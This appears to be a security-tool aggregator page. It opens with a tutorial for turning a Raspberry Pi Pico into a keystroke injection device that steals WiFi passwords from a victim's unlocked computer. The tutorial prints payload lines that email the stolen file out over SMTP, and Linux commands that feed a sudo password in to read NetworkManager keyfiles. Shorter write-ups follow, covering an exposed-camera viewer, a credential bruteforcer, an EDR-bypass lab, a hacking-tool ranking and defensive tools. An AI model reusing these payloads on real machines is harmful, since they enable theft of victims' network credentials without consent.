During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit and/or with the Linux password and USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer must have internet access in order to send the stolen data via SMTP for exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. STRING accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of the corresponding keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. Delay is also useful at the very beginning, when a new USB device is connected to a targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it using encryption or compression to avoid detection while sending it over the network. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions, visit the following link. The payload template also needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but be mindful of the SMTP server address and port number you write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses an .ini-style keyfile format to store network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex in order to extract the data of interest. For file filtering, a positive lookbehind assertion was used ((?<=keyword)). The positive lookbehind assertion matches at a certain position in the string, i.e. right after the keyword, without making that text itself part of the match, so the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after the SSID and psk (pre-shared key) keywords.
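
To see the lookbehind in action outside the payload, here is a small Python check of the same patterns against a keyfile-style snippet (the values are illustrative):

# The same lookbehind patterns the payload feeds to grep -oP, shown with
# Python's re module against a keyfile-style snippet.
import re

keyfile = """[wifi]
ssid=WLAN1
[wifi-security]
psk=pass1
"""

ssid = re.search(r"(?<=ssid=).*", keyfile).group()
psk = re.search(r"(?<=psk=).*", keyfile).group()
print(ssid, psk)  # WLAN1 pass1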

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully, you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy; quite the opposite, it's really bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Pantheon - Insecure Camera Parser

By: Zion3R


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was originally functionality without the use of any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully independent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

License

MIT License
Copyright (c) Josh Schiavone



Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As in previous years, we have made a ranking of the most popular tools published between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R


VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.

Introduction

eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating that each return address matches a known call site.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.


How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.

wCFI

wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.
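
As a userspace-side illustration of the wCFI idea, the sketch below builds a set of valid call-site addresses and flags any return address outside it. File names, formats, and addresses are placeholders, not VED-eBPF's actual code:

# Illustrative wCFI-style check: load valid call sites, validate a stack.
def load_callsites(path):
    # One hex address per line, e.g. derived from objdump and /proc/kallsyms.
    with open(path) as f:
        return {int(line, 16) for line in f if line.strip()}

def first_invalid(return_addrs, callsites):
    # Return the first return address that is not a known call site, else None.
    for addr in return_addrs:
        if addr not in callsites:
            return addr
    return None

callsites = load_callsites("callsites.txt")  # placeholder file
stack = [0xffffffff81000010, 0xdeadbeef]     # placeholder stack trace
bad = first_invalid(stack, callsites)
if bad is not None:
    print(f"wCFI violation: invalid return address {bad:#x}")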

PSD

PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.
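
For a flavor of what such credential tracing looks like with the BCC toolkit, here is a hypothetical minimal example that attaches a kprobe to commit_creds and streams events to userspace through a perf buffer; it is a bare sketch, not VED-eBPF's actual program:

# Hypothetical BCC sketch: kprobe on commit_creds, events via perf buffer.
from bcc import BPF

prog = r"""
#include <uapi/linux/ptrace.h>
#include <linux/sched.h>

struct cred_event {
    u32 pid;
    u32 uid;
    char comm[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(events);

int trace_commit_creds(struct pt_regs *ctx) {
    struct cred_event ev = {};
    ev.pid = bpf_get_current_pid_tgid() >> 32;
    ev.uid = bpf_get_current_uid_gid();   // lower 32 bits hold the uid
    bpf_get_current_comm(&ev.comm, sizeof(ev.comm));
    events.perf_submit(ctx, &ev, sizeof(ev));
    return 0;
}
"""

b = BPF(text=prog)
b.attach_kprobe(event="commit_creds", fn_name="trace_commit_creds")

def handle(cpu, data, size):
    ev = b["events"].event(data)
    print(f"commit_creds: pid={ev.pid} uid={ev.uid} comm={ev.comm.decode()}")

b["events"].open_perf_buffer(handle)
while True:
    b.perf_buffer_poll()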

Prerequisites

VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics

Conclusion

VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real-time and analyzed to identify emerging kernel threats in cloud-native environments.



Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R


Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.


Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

Benchmark

Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

Test Name                   | Hydra Tasks | Hydra Time | Legba Tasks | Legba Time
HTTP basic auth             | 16          | 7.100s     | 10          | 1.560s (4.5x faster)
HTTP POST login (wordpress) | 16          | 14.854s    | 10          | 5.045s (2.9x faster)
SSH                         | 16          | 7m29.85s * | 10          | 8.150s (55.1x faster)
MySQL                       | 4 **        | 9.819s     | 4 **        | 2.542s (3.8x faster)
Microsoft SQL               | 16          | 7.609s     | 10          | 4.789s (1.5x faster)

* This result would suggest a default delay between connection attempts in Hydra. I've tried to find such a delay in the source code, but to my knowledge there is none; for some reason it's simply very slow.
** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

License

Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

By: Zion3R


Little AV/EDR evasion lab for training & learning purposes. (under construction)

 ____            _     _____ ____  ____     ___   __   _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing the user-mode detection methods frequently used by these security solutions. These techniques are mainly based on dynamic analysis of the target process state (memory, API calls, etc.).

Feel free to check this short article I wrote that describes the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

        Usage: BestEdrOfTheMarket.exe [args]

/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


Blutter - Flutter Mobile Application Reverse Engineering Tool

By: Zion3R


Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

Currently the application supports only Android libapp.so (arm64 only). Also, the application currently works only against recent Dart versions.

For high priority missing features, see TODO


Environment Setup

This application uses the C++20 Formatting library. It requires a very recent C++ compiler, such as g++ >= 13 or Clang >= 15.

I recommend using a Linux OS (only tested on Debian sid/trixie) because it is easy to set up.

Debian Unstable (gcc 13)

  • Install build tools and dependencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev

Windows

  • Install git and python 3
  • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
  • Install required libraries (libcapstone and libicu4c)
python scripts\init_env_win.py
  • Start "x64 Native Tools Command Prompt"

macOS Ventura (clang 15)

  • Install XCode
  • Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests

Usage

Extract "lib" directory from apk file

python3 blutter.py path/to/app/lib/arm64-v8a out_dir

blutter.py will automatically detect the Dart version from the Flutter engine and call the appropriate blutter executable to get the information from libapp.so.

If the blutter executable for the required Dart version does not exist, the script will automatically check out the Dart source code and compile it.

Update

You can use git pull to update, then run blutter.py with the --rebuild option to force rebuilding the executable:

python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild

Output files

  • asm/* libapp assemblies with symbols
  • blutter_frida.js the frida script template for the target application
  • objs.txt complete (nested) dump of Object from Object Pool
  • pp.txt all Dart objects in Object Pool

Directories

  • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
  • blutter contains source code. need building against Dart VM library
  • build contains building projects which can be deleted after finishing the build process
  • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
  • external contains 3rd party libraries for Windows only
  • packages contains the static libraries of Dart Runtime
  • scripts contains python scripts for getting/building Dart

Generating Visual Studio Solution for Development

I use Visual Studio to develop Blutter on Windows. The --vs-sln option can be used to generate a Visual Studio solution.

python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln

TODO

  • More code analysis
    • Function arguments and return type
    • Some pseudocode for code patterns
  • Generate better Frida script
    • More internal classes
    • Object modification
  • Obfuscated app (still missing many functions)
  • Reading iOS binary
  • Input as apk or ipa


Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score that you can use for prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).

MetaHub describes your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resource's tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also to its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations, combined with the information from all the security findings affecting the resource, MetaHub will generate a score for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account, cloudtrail, and impact.



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resource. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default config and tags are enabled, but you can change this behavior using the option --context (to enable all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings, such as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource types support this API. You can check the supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical CloudTrail events related to the affected resource, such as creation events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is running, such as whether it's part of an AWS Organization, information about its contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates how the affected resource is exposed to other networks: for example, whether the affected resource is public, whether it is part of a VPC, whether it has a public IP, and whether it is protected by a firewall or a security group.

Possible Statuses    | Value | Description
effectively-public   | 100%  | The resource is effectively public from the Internet.
restricted-public    | 40%   | The resource is public, but there is a restriction like a Security Group.
unrestricted-private | 30%   | The resource is private but unrestricted, like an open security group.
launch-public        | 10%   | These are resources that can launch other resources as public, for example an Auto Scaling group or a Subnet.
restricted           | 0%    | The resource is restricted.
unknown              | -     | The resource couldn't be checked.

Access

Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any association to other resources like IAM roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects any other resource that uses it.

Possible Statuses       | Value | Description
unrestricted            | 100%  | The principal is unrestricted, without any condition or restriction.
untrusted-principal     | 70%   | The principal is an AWS Account that is not part of your trusted accounts.
unrestricted-principal  | 40%   | The principal is not restricted (defined with a wildcard). There could be conditions restricting it, or other restrictions like S3 public blocks.
cross-account-principal | 30%   | The principal is from another AWS account.
unrestricted-actions    | 30%   | The actions are defined using wildcards.
dangerous-actions       | 30%   | Some dangerous actions are defined as part of this policy.
unrestricted-service    | 10%   | The policy allows an AWS service as principal without restriction.
restricted              | 0%    | The policy is restricted.
unknown                 | -     | The policy couldn't be checked.

Encryption

Encryption evaluates the different encryption layers based on each resource type. For example, for some resources it evaluates whether the at_rest and in_transit encryption configurations are both enabled.

Possible Statuses | Value | Description
unencrypted       | 100%  | The resource is not fully encrypted.
encrypted         | 0%    | The resource is fully encrypted, including any of its associations.
unknown           | -     | The resource encryption couldn't be checked.

Status

Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate whether the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate whether those resources are attached to any other resource.

Possible Statuses | Value | Description
attached          | 100%  | The resource supports attachment and is attached.
running           | 100%  | The resource supports running and is running.
enabled           | 100%  | The resource supports enabled and is enabled.
not-attached      | 0%    | The resource supports attachment and is not attached.
not-running       | 0%    | The resource supports running and is not running.
not-enabled       | 0%    | The resource supports enabled and is not enabled.
unknown           | -     | The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses | Value | Description
production        | 100%  | It is a production resource.
staging           | 30%   | It is a staging resource.
development       | 0%    | It is a development resource.
unknown           | -     | The resource couldn't be checked for environment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the tag awsApplication, but you can extend this functionality based on your context, for example by defining other tags you use for identifying applications or services (like Service or any other), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses | Value | Description
unknown           | -     | The resource couldn't be checked for application.

Findings Scoring

As part of the impact score calculation, we also evaluate the total number of security findings affecting the resource and their severities. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
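
The same calculation, written out as a minimal Python sketch; the severity weights are taken from the example above (MEDIUM is an assumed value, and the real weights live in MetaHub's configuration files):

# Findings-score sketch; weights follow the example (MEDIUM is assumed).
SEVERITY_VALUES = {"LOW": 0.5, "MEDIUM": 1, "HIGH": 3, "CRITICAL": 4}

def findings_score(severities, highest="CRITICAL"):
    total = sum(SEVERITY_VALUES[s] / SEVERITY_VALUES[highest] for s in severities)
    return min(total, 1.0)  # capped at 1, per the formula

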